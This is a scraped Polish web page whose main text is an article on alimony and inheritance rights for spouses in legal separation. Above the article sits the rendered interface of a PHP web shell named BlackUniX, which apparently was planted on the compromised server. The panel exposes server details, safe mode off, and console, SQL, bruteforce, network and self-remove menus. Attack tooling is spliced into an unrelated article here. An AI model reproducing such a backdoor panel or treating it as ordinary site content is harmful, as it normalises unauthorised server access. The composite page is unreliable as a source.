W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-22 01:58:54
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.224.91.246
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Małżonek w separacji ma prawo do wsparcia
21.09.2008.
Małżonek, który nie jest wyłącznie winny separacji, może liczyć na alimenty od współmałzonka. W pozwie separację małżonek może domagać się alimentów od współmałzonka. Wolno tego żądać również w odrębnej sprawie wniesionej do sądu po separacji. Jednakże, jeśli separacja zostanie orzeczona bez orzekania winie, alimenty będą przysługiwały tylko wówczas, gdy zdana osoba najduje się w niedostatku. Natomiast jeśli separacja zostanie orzeczona z wyłącznej winy drugiego małżonka, alimenty będą przysługiwać także wówczas, gdy zainteresowany świadczeniem nie znajduje się w niedostatku. Wystarczającym uzasadnieniem dla ich przyznanie jest wówczas to, że separacja pociąga za sobą istotne pogorszenie sytuacji materialnej osoby wnoszącej o świadczenie. Pozwany małżonek zobowiązany jest wtedy przyczyniać się poprzez alimenty do zaspokajania usprawiedliwionych potrzeb wnoszącego o świadczenie małżonka. Jednakże sąd przy ustalaniu wysokości alimentów musi uwzględniać także możliwości zarobkowe i majątkowe tego, kto ma je płacić. Inaczej niż w wypadku rozwodu, nie ma żadnego czasowego ograniczenia prawa do alimentów dla pozostającego w separacji .

Zaznaczyć trzeba, że małżonkowie mają po separacji obowiązek wzajemnej pomocy, ale tylko jeśli wymagają tego względy słuszności.

Jednym z najistotniejszych skutków separacji, jest wyłączenie prawa do dziedziczenia po małzonku . Majątek czy jakaś część majątku małżonka, który zmarł w separacji, może przypaść drugiemu z nich tylko wówczas, gdy zmarły uwzględnił go w testamencie. Prawo po zachowku nie wchodzi w takich wypadkach w rachubę. Dodać warto, że z dniem uprawomocnienia się wyroku orzekającego separację ustaje wspólność majątkowa między małżonkami, jeśli już wcześniej nie ustała wskutek umowy majątkowej małżeńskiej spisanej u notariusza (intercyzy) lub wskutek wyroku sądowego znoszącego tę wspólność, czy też upadłości jednego z małżonków.
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


22.06.2018.